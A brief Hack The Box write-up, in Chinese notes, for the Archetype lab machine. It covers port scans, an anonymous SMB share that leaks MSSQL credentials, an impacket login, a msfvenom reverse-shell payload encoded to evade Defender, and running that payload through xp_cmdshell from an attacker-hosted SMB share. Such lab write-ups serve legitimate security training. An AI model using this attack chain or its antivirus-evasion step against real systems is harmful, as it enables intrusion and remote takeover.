Archetype (Hack The Box Writeup)
掃 Port
rustscan -a 10.10.10.27 -r 1-65535
- nmap 繼續掃
nmap -A -p135,139,445,5985,47001,49664,49665,49666,49667,49669,49668 10.10.10.27
- 一堆的 RPC
- SMB
- 1433 是 MSSQL
SMB
- SMB 匿名登入
- 發現
backups
- backups 資料夾
- 取得密碼資訊
- Host Name :
ARCHETYPE
- User ID :
sql_svc
- Password :
M3g4c0rp123
MSSQL
- 安裝 impacket
sudo apt install python3-impacket
impacket-mssqlclient -p 1433 sql_svc@10.10.10.27 -windows-auth
- MSSQL 取得 Shell 就有機會可以 RCE
systeminfo
dir
- 透過開啟本地 smb
impacket-smbserver meow .
- 準備 Reverse shell
msfvenom -p windows/shell_reverse_tcp LHOST=10.10.16.16 LPORT=7877 -e x86/shikata_ga_nai -f exe > shell.exe
- 經測試,不掛
x86/shikata_ga_nai
就會被 Defender 吃掉
Shell
- 執行 Shell
exec xp_cmdshell '\\10.10.16.16\meow\shell.exe'
- 收回 Reverse shell
- 取得 User Flag